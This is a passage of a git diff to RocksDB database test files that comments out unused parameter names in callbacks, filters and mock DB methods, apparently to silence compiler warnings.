/*arg*/) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); db_iter_->Prev(); @@ -2494,7 +2494,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace2) { // mem table after MergeIterator::Prev() realized the mem tableiterator is at // its end and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) { + "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) { internal_iter2_->Add("z", kTypeValue, "7", 12u); internal_iter2_->Add("z", kTypeValue, "7", 11u); }); @@ -2532,7 +2532,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace3) { // mem table after MergeIterator::Prev() realized the mem table iterator is at // its end and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) { + "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) { internal_iter2_->Add("z", kTypeValue, "7", 16u, true); internal_iter2_->Add("z", kTypeValue, "7", 15u, true); internal_iter2_->Add("z", kTypeValue, "7", 14u, true); diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index 90f43ea374d..9d344e7af86 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -24,7 +24,7 @@ class DBIteratorTest : public DBTestBase { class FlushBlockEveryKeyPolicy : public FlushBlockPolicy { public: - virtual bool Update(const Slice& key, const Slice& value) override { + virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override { if (!start_) { start_ = true; return false; @@ -44,8 +44,8 @@ class FlushBlockEveryKeyPolicyFactory : public FlushBlockPolicyFactory { } FlushBlockPolicy* NewFlushBlockPolicy( - const BlockBasedTableOptions& table_options, - const BlockBuilder& data_block_builder) const override { + const BlockBasedTableOptions& /*table_options*/, + const BlockBuilder& /*data_block_builder*/) const override { return new FlushBlockEveryKeyPolicy; } }; diff --git a/db/db_memtable_test.cc b/db/db_memtable_test.cc index 63d274f6ab5..5ce3e319122 100644 --- a/db/db_memtable_test.cc +++ b/db/db_memtable_test.cc @@ -121,7 +121,7 @@ class TestPrefixExtractor : public SliceTransform { return separator(key) != nullptr; } - virtual bool InRange(const Slice& key) const override { return false; } + virtual bool InRange(const Slice& /*key*/) const override { return false; } private: const char* separator(const Slice& key) const { diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc index b09fe1ffacc..2b099a39a45 100644 --- a/db/db_properties_test.cc +++ b/db/db_properties_test.cc @@ -985,8 +985,9 @@ class CountingUserTblPropCollector : public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, - SequenceNumber seq, uint64_t file_size) override { + Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, + EntryType /*type*/, SequenceNumber /*seq*/, + uint64_t /*file_size*/) override { ++count_; return Status::OK(); } @@ -1027,8 +1028,9 @@ class CountingDeleteTabPropCollector : public TablePropertiesCollector { public: const char* Name() const override { return "CountingDeleteTabPropCollector"; } - Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, - SequenceNumber seq, uint64_t file_size) override { + Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, + EntryType type, SequenceNumber /*seq*/, + uint64_t /*file_size*/) override { if (type == kEntryDelete) { num_deletes_++; } @@ -1055,7 +1057,7 @@ class CountingDeleteTabPropCollectorFactory : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) override { + TablePropertiesCollectorFactory::Context /*context*/) override { return new CountingDeleteTabPropCollector(); } const char* Name() const override { diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 73c6fe8016d..9427e0b5c98 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -231,11 +231,12 @@ TEST_F(DBSSTTest, DBWithSstFileManager) { int files_deleted = 0; int files_moved = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnAddFile", [&](void* arg) { files_added++; }); + "SstFileManagerImpl::OnAddFile", [&](void* /*arg*/) { files_added++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnDeleteFile", [&](void* arg) { files_deleted++; }); + "SstFileManagerImpl::OnDeleteFile", + [&](void* /*arg*/) { files_deleted++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "SstFileManagerImpl::OnMoveFile", [&](void* arg) { files_moved++; }); + "SstFileManagerImpl::OnMoveFile", [&](void* /*arg*/) { files_moved++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -385,7 +386,7 @@ TEST_F(DBSSTTest, DeleteSchedulerMultipleDBPaths) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -453,7 +454,7 @@ TEST_F(DBSSTTest, DestroyDBWithRateLimitedDelete) { int bg_delete_file = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DeleteScheduler::DeleteTrashFile:DeleteFile", - [&](void* arg) { bg_delete_file++; }); + [&](void* /*arg*/) { bg_delete_file++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Status s; @@ -546,7 +547,7 @@ TEST_F(DBSSTTest, DBWithMaxSpaceAllowedRandomized) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::FinishCompactionOutputFile:MaxAllowedSpaceReached", - [&](void* arg) { + [&](void* /*arg*/) { bg_error_set = true; GetAllSSTFiles(&total_sst_files_size); reached_max_space_on_compaction++; diff --git a/db/db_tailing_iter_test.cc b/db/db_tailing_iter_test.cc index d217828db9d..8301d5a92d4 100644 --- a/db/db_tailing_iter_test.cc +++ b/db/db_tailing_iter_test.cc @@ -157,10 +157,10 @@ TEST_F(DBTestTailingIterator, TailingIteratorTrimSeekToNext) { }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::RenewIterators:Null", - [&](void* arg) { file_iters_renewed_null = true; }); + [&](void* /*arg*/) { file_iters_renewed_null = true; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::RenewIterators:Copy", - [&](void* arg) { file_iters_renewed_copy = true; }); + [&](void* /*arg*/) { file_iters_renewed_copy = true; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); const int num_records = 1000; for (int i = 1; i < num_records; ++i) { @@ -415,7 +415,7 @@ TEST_F(DBTestTailingIterator, TailingIteratorUpperBound) { int immutable_seeks = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "ForwardIterator::SeekInternal:Immutable", - [&](void* arg) { ++immutable_seeks; }); + [&](void* /*arg*/) { ++immutable_seeks; }); // Seek to 13. This should not require any immutable seeks. rocksdb::SyncPoint::GetInstance()->EnableProcessing(); diff --git a/db/db_test.cc b/db/db_test.cc index e9840faa042..16d6580bbd3 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -231,11 +231,11 @@ TEST_F(DBTest, SkipDelay) { std::atomic sleep_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Sleep", - [&](void* arg) { sleep_count.fetch_add(1); }); + [&](void* /*arg*/) { sleep_count.fetch_add(1); }); std::atomic wait_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Wait", - [&](void* arg) { wait_count.fetch_add(1); }); + [&](void* /*arg*/) { wait_count.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); WriteOptions wo; @@ -715,9 +715,9 @@ TEST_F(DBTest, FlushSchedule) { namespace { class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { return false; } @@ -747,9 +747,9 @@ class KeepFilterFactory : public CompactionFilterFactory { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -764,7 +764,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -2210,17 +2210,17 @@ class ModelDB : public DB { return Write(o, &batch); } using DB::Get; - virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* cf, - const Slice& key, PinnableSlice* value) override { + virtual Status Get(const ReadOptions& /*options*/, ColumnFamilyHandle* /*cf*/, + const Slice& key, PinnableSlice* /*value*/) override { return Status::NotSupported(key); } using DB::MultiGet; virtual std::vector MultiGet( - const ReadOptions& options, - const std::vector& column_family, + const ReadOptions& /*options*/, + const std::vector& /*column_family*/, const std::vector& keys, - std::vector* values) override { + std::vector* /*values*/) override { std::vector s(keys.size(), Status::NotSupported("Not implemented.")); return s; @@ -2229,30 +2229,30 @@ class ModelDB : public DB { #ifndef ROCKSDB_LITE using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* column_family, - const std::vector& external_files, - const IngestExternalFileOptions& options) override { + ColumnFamilyHandle* /*column_family*/, + const std::vector& /*external_files*/, + const IngestExternalFileOptions& /*options*/) override { return Status::NotSupported("Not implemented."); } using DB::GetPropertiesOfAllTables; virtual Status GetPropertiesOfAllTables( - ColumnFamilyHandle* column_family, - TablePropertiesCollection* props) override { + ColumnFamilyHandle* /*column_family*/, + TablePropertiesCollection* /*props*/) override { return Status(); } virtual Status GetPropertiesOfTablesInRange( - ColumnFamilyHandle* column_family, const Range* range, std::size_t n, - TablePropertiesCollection* props) override { + ColumnFamilyHandle* /*column_family*/, const Range* /*range*/, + std::size_t /*n*/, TablePropertiesCollection* /*props*/) override { return Status(); } #endif // ROCKSDB_LITE using DB::KeyMayExist; - virtual bool KeyMayExist(const ReadOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - std::string* value, + virtual bool KeyMayExist(const ReadOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, std::string* /*value*/, bool* value_found = nullptr) override { if (value_found != nullptr) { *value_found = false; @@ -2260,8 +2260,9 @@ class ModelDB : public DB { return true; // Not Supported directly } using DB::NewIterator; - virtual Iterator* NewIterator(const ReadOptions& options, - ColumnFamilyHandle* column_family) override { + virtual Iterator* NewIterator( + const ReadOptions& options, + ColumnFamilyHandle* /*column_family*/) override { if (options.snapshot == nullptr) { KVMap* saved = new KVMap; *saved = map_; @@ -2273,9 +2274,9 @@ class ModelDB : public DB { } } virtual Status NewIterators( - const ReadOptions& options, - const std::vector& column_family, - std::vector* iterators) override { + const ReadOptions& /*options*/, + const std::vector& /*column_family*/, + std::vector* /*iterators*/) override { return Status::NotSupported("Not supported yet"); } virtual const Snapshot* GetSnapshot() override { @@ -2288,7 +2289,7 @@ class ModelDB : public DB { delete reinterpret_cast(snapshot); } - virtual Status Write(const WriteOptions& options, + virtual Status Write(const WriteOptions& /*options*/, WriteBatch* batch) override { class Handler : public WriteBatch::Handler { public: @@ -2296,7 +2297,8 @@ class ModelDB : public DB { virtual void Put(const Slice& key, const Slice& value) override { (*map_)[key.ToString()] = value.ToString(); } - virtual void Merge(const Slice& key, const Slice& value) override { + virtual void Merge(const Slice& /*key*/, + const Slice& /*value*/) override { // ignore merge for now // (*map_)[key.ToString()] = value.ToString(); } @@ -2310,62 +2312,65 @@ class ModelDB : public DB { } using DB::GetProperty; - virtual bool GetProperty(ColumnFamilyHandle* column_family, - const Slice& property, std::string* value) override { + virtual bool GetProperty(ColumnFamilyHandle* /*column_family*/, + const Slice& /*property*/, + std::string* /*value*/) override { return false; } using DB::GetIntProperty; - virtual bool GetIntProperty(ColumnFamilyHandle* column_family, - const Slice& property, uint64_t* value) override { + virtual bool GetIntProperty(ColumnFamilyHandle* /*column_family*/, + const Slice& /*property*/, + uint64_t* /*value*/) override { return false; } using DB::GetMapProperty; - virtual bool GetMapProperty(ColumnFamilyHandle* column_family, - const Slice& property, - std::map* value) override { + virtual bool GetMapProperty( + ColumnFamilyHandle* /*column_family*/, const Slice& /*property*/, + std::map* /*value*/) override { return false; } using DB::GetAggregatedIntProperty; - virtual bool GetAggregatedIntProperty(const Slice& property, - uint64_t* value) override { + virtual bool GetAggregatedIntProperty(const Slice& /*property*/, + uint64_t* /*value*/) override { return false; } using DB::GetApproximateSizes; - virtual void GetApproximateSizes(ColumnFamilyHandle* column_family, - const Range* range, int n, uint64_t* sizes, - uint8_t include_flags + virtual void GetApproximateSizes(ColumnFamilyHandle* /*column_family*/, + const Range* /*range*/, int n, + uint64_t* sizes, + uint8_t /*include_flags*/ = INCLUDE_FILES) override { for (int i = 0; i < n; i++) { sizes[i] = 0; } } using DB::GetApproximateMemTableStats; - virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family, - const Range& range, - uint64_t* const count, - uint64_t* const size) override { + virtual void GetApproximateMemTableStats( + ColumnFamilyHandle* /*column_family*/, const Range& /*range*/, + uint64_t* const count, uint64_t* const size) override { *count = 0; *size = 0; } using DB::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& options, - ColumnFamilyHandle* column_family, - const Slice* start, const Slice* end) override { + virtual Status CompactRange(const CompactRangeOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice* /*start*/, + const Slice* /*end*/) override { return Status::NotSupported("Not supported operation."); } virtual Status SetDBOptions( - const std::unordered_map& new_options) + const std::unordered_map& /*new_options*/) override { return Status::NotSupported("Not supported operation."); } using DB::CompactFiles; - virtual Status CompactFiles(const CompactionOptions& compact_options, - ColumnFamilyHandle* column_family, - const std::vector& input_file_names, - const int output_level, - const int output_path_id = -1) override { + virtual Status CompactFiles( + const CompactionOptions& /*compact_options*/, + ColumnFamilyHandle* /*column_family*/, + const std::vector& /*input_file_names*/, + const int /*output_level*/, const int /*output_path_id*/ = -1) override { return Status::NotSupported("Not supported operation."); } @@ -2378,24 +2383,25 @@ class ModelDB : public DB { } Status EnableAutoCompaction( - const std::vector& column_family_handles) override { + const std::vector& /*column_family_handles*/) + override { return Status::NotSupported("Not supported operation."); } using DB::NumberLevels; - virtual int NumberLevels(ColumnFamilyHandle* column_family) override { + virtual int NumberLevels(ColumnFamilyHandle* /*column_family*/) override { return 1; } using DB::MaxMemCompactionLevel; virtual int MaxMemCompactionLevel( - ColumnFamilyHandle* column_family) override { + ColumnFamilyHandle* /*column_family*/) override { return 1; } using DB::Level0StopWriteTrigger; virtual int Level0StopWriteTrigger( - ColumnFamilyHandle* column_family) override { + ColumnFamilyHandle* /*column_family*/) override { return -1; } @@ -2404,7 +2410,8 @@ class ModelDB : public DB { virtual Env* GetEnv() const override { return nullptr; } using DB::GetOptions; - virtual Options GetOptions(ColumnFamilyHandle* column_family) const override { + virtual Options GetOptions( + ColumnFamilyHandle* /*column_family*/) const override { return options_; } @@ -2412,8 +2419,8 @@ class ModelDB : public DB { virtual DBOptions GetDBOptions() const override { return options_; } using DB::Flush; - virtual Status Flush(const rocksdb::FlushOptions& options, - ColumnFamilyHandle* column_family) override { + virtual Status Flush(const rocksdb::FlushOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/) override { Status ret; return ret; } @@ -2423,33 +2430,35 @@ class ModelDB : public DB { #ifndef ROCKSDB_LITE virtual Status DisableFileDeletions() override { return Status::OK(); } - virtual Status EnableFileDeletions(bool force) override { + virtual Status EnableFileDeletions(bool /*force*/) override { return Status::OK(); } - virtual Status GetLiveFiles(std::vector&, uint64_t* size, - bool flush_memtable = true) override { + virtual Status GetLiveFiles(std::vector&, uint64_t* /*size*/, + bool /*flush_memtable*/ = true) override { return Status::OK(); } - virtual Status GetSortedWalFiles(VectorLogPtr& files) override { + virtual Status GetSortedWalFiles(VectorLogPtr& /*files*/) override { return Status::OK(); } - virtual Status DeleteFile(std::string name) override { return Status::OK(); } + virtual Status DeleteFile(std::string /*name*/) override { + return Status::OK(); + } virtual Status GetUpdatesSince( rocksdb::SequenceNumber, unique_ptr*, - const TransactionLogIterator::ReadOptions& read_options = + const TransactionLogIterator::ReadOptions& /*read_options*/ = TransactionLogIterator::ReadOptions()) override { return Status::NotSupported("Not supported in Model DB"); } virtual void GetColumnFamilyMetaData( - ColumnFamilyHandle* column_family, - ColumnFamilyMetaData* metadata) override {} + ColumnFamilyHandle* /*column_family*/, + ColumnFamilyMetaData* /*metadata*/) override {} #endif // ROCKSDB_LITE - virtual Status GetDbIdentity(std::string& identity) const override { + virtual Status GetDbIdentity(std::string& /*identity*/) const override { return Status::OK(); } @@ -3322,7 +3331,7 @@ TEST_F(DBTest, DynamicMemtableOptions) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Wait", - [&](void* arg) { sleeping_task_low.WakeUp(); }); + [&](void* /*arg*/) { sleeping_task_low.WakeUp(); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); while (!sleeping_task_low.WokenUp() && count < 256) { @@ -4530,7 +4539,7 @@ class DelayedMergeOperator : public MergeOperator { public: explicit DelayedMergeOperator(DBTest* d) : db_test_(d) {} - virtual bool FullMergeV2(const MergeOperationInput& merge_in, + virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, MergeOperationOutput* merge_out) const override { db_test_->env_->addon_time_.fetch_add(1000); merge_out->new_value = ""; @@ -4881,7 +4890,7 @@ TEST_F(DBTest, AutomaticConflictsWithManualCompaction) { std::atomic callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction()::Conflict", - [&](void* arg) { callback_count.fetch_add(1); }); + [&](void* /*arg*/) { callback_count.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); CompactRangeOptions croptions; croptions.exclusive_manual_compaction = false; @@ -5080,7 +5089,7 @@ TEST_F(DBTest, HardLimit) { std::atomic callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack("DBImpl::DelayWrite:Wait", - [&](void* arg) { + [&](void* /*arg*/) { callback_count.fetch_add(1); sleeping_task_low.WakeUp(); }); @@ -5173,7 +5182,7 @@ TEST_F(DBTest, SoftLimit) { // Only allow one compactin going through. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "BackgroundCallCompaction:0", [&](void* arg) { + "BackgroundCallCompaction:0", [&](void* /*arg*/) { // Schedule a sleeping task. sleeping_task_low.Reset(); env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, diff --git a/db/db_test2.cc b/db/db_test2.cc index aa10789c851..32f2896cd08 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -497,9 +497,9 @@ TEST_F(DBTest2, WalFilterTest) { apply_option_at_record_index_(apply_option_for_record_index), current_record_index_(0) {} - virtual WalProcessingOption LogRecord(const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) const override { + virtual WalProcessingOption LogRecord( + const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/, + bool* /*batch_changed*/) const override { WalFilter::WalProcessingOption option_to_return; if (current_record_index_ == apply_option_at_record_index_) { @@ -873,11 +873,10 @@ TEST_F(DBTest2, WalFilterTestWithColumnFamilies) { cf_name_id_map_ = cf_name_id_map; } - virtual WalProcessingOption LogRecordFound(unsigned long long log_number, - const std::string& log_file_name, - const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) override { + virtual WalProcessingOption LogRecordFound( + unsigned long long log_number, const std::string& /*log_file_name*/, + const WriteBatch& batch, WriteBatch* /*new_batch*/, + bool* /*batch_changed*/) override { class LogRecordBatchHandler : public WriteBatch::Handler { private: const std::map & cf_log_number_map_; @@ -1212,7 +1211,7 @@ class CompactionStallTestListener : public EventListener { public: CompactionStallTestListener() : compacted_files_cnt_(0) {} - void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { ASSERT_EQ(ci.cf_name, "default"); ASSERT_EQ(ci.base_input_level, 0); ASSERT_EQ(ci.compaction_reason, CompactionReason::kLevelL0FilesNum); @@ -1673,7 +1672,7 @@ TEST_F(DBTest2, SyncPointMarker) { std::atomic sync_point_called(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBTest2::MarkedPoint", - [&](void* arg) { sync_point_called.fetch_add(1); }); + [&](void* /*arg*/) { sync_point_called.fetch_add(1); }); // The first dependency enforces Marker can be loaded before MarkedPoint. // The second checks that thread 1's MarkedPoint should be disabled here. @@ -1942,7 +1941,7 @@ TEST_F(DBTest2, AutomaticCompactionOverlapManualCompaction) { // can fit in L2, these 2 files will be moved to L2 and overlap with // the running compaction and break the LSM consistency. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* arg) { + "CompactionJob::Run():Start", [&](void* /*arg*/) { ASSERT_OK( dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"}, {"max_bytes_for_level_base", "1"}})); @@ -2008,7 +2007,7 @@ TEST_F(DBTest2, ManualCompactionOverlapManualCompaction) { // the running compaction and break the LSM consistency. std::atomic flag(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* arg) { + "CompactionJob::Run():Start", [&](void* /*arg*/) { if (flag.exchange(true)) { // We want to make sure to call this callback only once return; diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 5ca4b19a253..966fec2cf97 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -1127,17 +1127,18 @@ UpdateStatus DBTestBase::updateInPlaceSmallerVarintSize(char* prevValue, } } -UpdateStatus DBTestBase::updateInPlaceLargerSize(char* prevValue, - uint32_t* prevSize, +UpdateStatus DBTestBase::updateInPlaceLargerSize(char* /*prevValue*/, + uint32_t* /*prevSize*/, Slice delta, std::string* newValue) { *newValue = std::string(delta.size(), 'c'); return UpdateStatus::UPDATED; } -UpdateStatus DBTestBase::updateInPlaceNoAction(char* prevValue, - uint32_t* prevSize, Slice delta, - std::string* newValue) { +UpdateStatus DBTestBase::updateInPlaceNoAction(char* /*prevValue*/, + uint32_t* /*prevSize*/, + Slice /*delta*/, + std::string* /*newValue*/) { return UpdateStatus::UPDATE_FAILED; } diff --git a/db/db_test_util.h b/db/db_test_util.h index cd1265e21f1..70cc6fd70a8 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -187,7 +187,7 @@ class SpecialSkipListFactory : public MemTableRepFactory { using MemTableRepFactory::CreateMemTableRep; virtual MemTableRep* CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) override { + const SliceTransform* transform, Logger* /*logger*/) override { return new SpecialMemTableRep( allocator, factory_.CreateMemTableRep(compare, allocator, transform, 0), num_entries_flush_); diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index c6334f8e067..c88bc30c1c9 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -56,9 +56,9 @@ void VerifyCompactionResult( class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, bool* value_changed) const - override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { return false; } @@ -88,9 +88,9 @@ class KeepFilterFactory : public CompactionFilterFactory { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -105,7 +105,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -522,7 +522,7 @@ TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionTrivialMove) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -593,23 +593,23 @@ TEST_P(DBTestUniversalCompactionParallel, UniversalCompactionParallel) { // Delay every compaction so multiple compactions will happen. std::atomic num_compactions_running(0); std::atomic has_parallel(false); - rocksdb::SyncPoint::GetInstance()->SetCallBack("CompactionJob::Run():Start", - [&](void* arg) { - if (num_compactions_running.fetch_add(1) > 0) { - has_parallel.store(true); - return; - } - for (int nwait = 0; nwait < 20000; nwait++) { - if (has_parallel.load() || num_compactions_running.load() > 1) { - has_parallel.store(true); - break; - } - env_->SleepForMicroseconds(1000); - } - }); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "CompactionJob::Run():Start", [&](void* /*arg*/) { + if (num_compactions_running.fetch_add(1) > 0) { + has_parallel.store(true); + return; + } + for (int nwait = 0; nwait < 20000; nwait++) { + if (has_parallel.load() || num_compactions_running.load() > 1) { + has_parallel.store(true); + break; + } + env_->SleepForMicroseconds(1000); + } + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():End", - [&](void* arg) { num_compactions_running.fetch_add(-1); }); + [&](void* /*arg*/) { num_compactions_running.fetch_add(-1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); options = CurrentOptions(options); @@ -984,7 +984,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest1) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -1030,7 +1030,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest2) { int32_t trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { ASSERT_TRUE(arg != nullptr); diff --git a/db/deletefile_test.cc b/db/deletefile_test.cc index 989c0c4118b..7a480fc4655 100644 --- a/db/deletefile_test.cc +++ b/db/deletefile_test.cc @@ -159,7 +159,7 @@ class DeleteFileTest : public testing::Test { } // An empty job to guard all jobs are processed - static void GuardFinish(void* arg) { + static void GuardFinish(void* /*arg*/) { TEST_SYNC_POINT("DeleteFileTest::GuardFinish"); } }; diff --git a/db/external_sst_file_test.cc b/db/external_sst_file_test.cc index 4a4e82e792d..0187265b6bb 100644 --- a/db/external_sst_file_test.cc +++ b/db/external_sst_file_test.cc @@ -395,8 +395,9 @@ class SstFileWriterCollector : public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, - SequenceNumber seq, uint64_t file_size) override { + Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, + EntryType /*type*/, SequenceNumber /*seq*/, + uint64_t /*file_size*/) override { ++count_; return Status::OK(); } @@ -416,7 +417,7 @@ class SstFileWriterCollectorFactory : public TablePropertiesCollectorFactory { explicit SstFileWriterCollectorFactory(std::string prefix) : prefix_(prefix), num_created_(0) {} virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) override { + TablePropertiesCollectorFactory::Context /*context*/) override { num_created_++; return new SstFileWriterCollector(prefix_); } @@ -687,7 +688,7 @@ TEST_F(ExternalSSTFileTest, PurgeObsoleteFilesBug) { DestroyAndReopen(options); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::AddFile:FileCopied", [&](void* arg) { + "DBImpl::AddFile:FileCopied", [&](void* /*arg*/) { ASSERT_OK(Put("aaa", "bbb")); ASSERT_OK(Flush()); ASSERT_OK(Put("aaa", "xxx")); @@ -1126,7 +1127,7 @@ TEST_F(ExternalSSTFileTest, PickedLevelBug) { std::atomic bg_compact_started(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:Start", - [&](void* arg) { bg_compact_started.store(true); }); + [&](void* /*arg*/) { bg_compact_started.store(true); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); @@ -1407,7 +1408,7 @@ TEST_F(ExternalSSTFileTest, AddFileTrivialMoveBug) { ASSERT_OK(GenerateAndAddExternalFile(options, {22, 23}, 6)); // L2 rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* arg) { + 